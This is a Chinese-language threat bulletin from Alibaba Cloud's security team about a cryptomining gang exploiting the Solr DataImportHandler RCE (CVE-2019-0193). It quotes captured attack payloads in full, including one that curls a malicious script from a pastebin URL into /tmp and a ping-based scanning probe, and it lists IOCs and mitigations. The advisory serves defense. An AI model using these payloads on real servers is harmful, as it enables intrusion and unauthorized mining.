威胁快报|Solr dataimport成挖矿团伙新型利用方式
概述
近日,阿里云安全团队监测到挖矿团伙利用solr dataimport RCE
(CVE-2019-0193)作为新的攻击方式对云上主机进行攻击,攻击成功后下载门罗币挖矿程序进行牟利。该团伙使用的恶意脚本与之前报道的“威胁预警 | watchbog挖矿蠕虫升级,利用Bluekeep RDP等多个漏洞蓄势待发”文章所提团伙使用的基本一致,因此基本认为是同一团伙所为。
除此之外,可以合理推测,该团伙一直活跃在寻找新的攻击方式来植入其恶意程序,阿里云安全团队已在第一时间对该利用方式进行了监控,并对该团伙的行为持续关注。建议用户及时排查自身主机是否受到影响,并关注阿里云安全团队的相关文章。
漏洞详情
漏洞简介
Apache Solr
是开源企业搜索平台,主要包括全文搜索、动态聚类、富文本处理等功能。Remote Code Execution via DataImportHandler(CVE-2019-0193)是apache Solr在2019.8.1日披露的漏洞预警,此漏洞发生在Solr的DataImportHandler(DIH)模块中,该模块提供从数据库或其他数据源获取数据的能力。由于Solr admin默认是不需要鉴权认证的,且DIH支持脚本操作,因此可以通过构造恶意http请求,实现远程命令执行。
如下图,在solr admin中选择dataimport选项卡,由于dataimport配置支持脚本,我们可以在配置文件中写入恶意脚本,执行curl xxx.xxx.xxx.xx指令。
如下图,我们服务端收到了solr发送的http请求,证明RCE成功。
利用分析
阿里云安全团队近日监测到有攻击者尝试利用此漏洞对阿里云上主机进行入侵。其首先发送http://xx.xx.xx.xx:8983/solr/admin/cores?action=STATUS&wt=json
的请求来获取solr中core的名称。
之后对这些core_name进行遍历,尝试向corename/dataimport发送如下payload进而向https://pastebin.com/raw/jjFzjCwx
请求恶意脚本。
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=<dataConfig> +<dataSource+type="URLDataSource"/> +<script><![CDATA[ +++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("curl+-fsSL+https://pastebin.com/raw/jjFzjCwx+-o+/tmp/baby"); +++++++++} +]]></script> +<document> +++<entity+name="stackoverflow" +++++++++++url="https://stackoverflow.com/feeds/tag/solr" +++++++++++processor="XPathEntityProcessor" +++++++++++forEach="/feed" +++++++++++transformer="script:poc"+/> +</document> </dataConfig>&name=dataimport
跟进https://pastebin.com/raw/jjFzjCwx
此地址的恶意脚本,发现其与之前的分析的watchdog挖矿程序只有一处不同,且为非关键内容,之后的部分可以参见之前的文章。
除此之外,还有疑似发送ping命令来收集存在漏洞主机的恶意请求:
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=solr&dataConfig=<dataConfig> <dataSource type="URLDataSource"/> <script> <![CDATA[ function poc(row) { var Runtime = Java.type("java.lang.Runtime"); Runtime.getRuntime().exec("ping -c 1 solr_CVE_2019_0193XfSIcGVY.awvsscan119.autoverify.cn"); return row; } ]]></script> </dataConfig>
漏洞影响
目前,全网使用solr组件的设备数大约在1.9w台左右,阿里云安全团队建议用户及时查看自身机器状态,防止事态进一步扩大。
IOC
- https://pastebin.com/raw/jjFzjCwx
- https://pastebin.com/raw/3FDDiNwW
- https://pastebin.com/raw/KJcZ9HLL
影响版本
- solr 8.2.0 之前版本(不包含)
- 需启用DataImportHandler模块
- solr 未启用鉴权认证或采用弱密码
安全建议
- 将solr 升级至8.2.0或更新版本(8.2.0版本之后默认不开启dataconfig参数支持)
- 设置solrconfig.xml->requestHandler->config标签内内容为空
- 与DIH相关的请求采用白名单过滤
参考文章
[1] 威胁预警 | watchbog挖矿蠕虫升级,利用Bluekeep RDP等多个漏洞蓄势待发
[2] CVE-2019-0193 Remote Code Execution via DataImportHandler
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
买了一台云服务器到底能干什么?
千万不能浪费了这台24小时不关机,还有公网IP的电脑! 搭建网站,写写技术文章,也可以投相关广告赚些外块;学习Linux;搭建ss;跑脚本抓价格,然后入手; 阿里云官方建站帮助文档: 阿里云官方建站帮助文档 阿里云官网产品价格表:阿里云官网产品价格表 阿里云产品学习路径:阿里云产品学习路径 从客户那里做了个调查,他们购买云服务器ECS作何用?第一名:搭建网站居多,一般个人站长写写博客、技术文章之类的,投一点广告,赚点外快;感觉企业建站的比较少,因为企业建站一般都找建站公司一站式解决了,而建站公司一般会选择更为低价的服务器来获取更多利润空间; 第二名:学习,阿里云为学生群体推出的云翼计划,学生机销量很高啊,学生用来学习Linux、Python等各种语言,学生搭建网站的也不少,所以回到第一名依然是建站的居多; 第三名:企业级客户,这类客户对服务器性能要求较高,这也是阿里云的主要收入吧,阿里云比较赚钱的是云盾安全产品; 第四名:租用阿里云按量付费做科学计算... 搭建一个简单的网站,阿里云轻量应用服务器就可以了!ps: 针对阿里云ECS服务器的活动,目前阿里云有两大活动,即:1. 入门级云服...
- 下一篇
2019阿里云910会员节大促主会场全攻略
2019阿里云910会员大促活动已经于8月28日正式开启,从已开放的活动页面来看,整场大促活动由阿里云10年有礼时光机、爆款产品推荐、七大分会场组成。 在910这个秋季大幅度优惠促销日,怎样才能花最少的钱配置最特惠的云服务?云栖社区小编特为各位用户奉献出省钱大法如下: 丨活动阵地: https://www.aliyun.com/acts/member-2019/index丨关键词:时光机、会员大礼包、爆款 一、阿里云会员时光机,领取大礼包 新用户礼包之一:新用户专享产品首购/新购折扣 一、活动对象阿里云官网已实名认证的新用户。 二、活动时间预热期:2019年8月28日—2019年9月2日正式期:2019年9月3日—2019年9月11日 三、活动内容1、活动期间,阿里云新用户可在活动页面领取新用户会员大礼包。①本活动礼包仅限新用户领取,阿里云老用
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- Windows10,CentOS7,CentOS8安装MongoDB4.0.16
- CentOS关闭SELinux安全模块
- CentOS6,7,8上安装Nginx,支持https2.0的开启
- Springboot2将连接池hikari替换为druid,体验最强大的数据库连接池
- CentOS8编译安装MySQL8.0.19
- CentOS7安装Docker,走上虚拟化容器引擎之路
- Eclipse初始化配置,告别卡顿、闪退、编译时间过长
- CentOS7,8上快速安装Gitea,搭建Git服务器
- SpringBoot2整合Redis,开启缓存,提高访问速度
- CentOS7设置SWAP分区,小内存服务器的救世主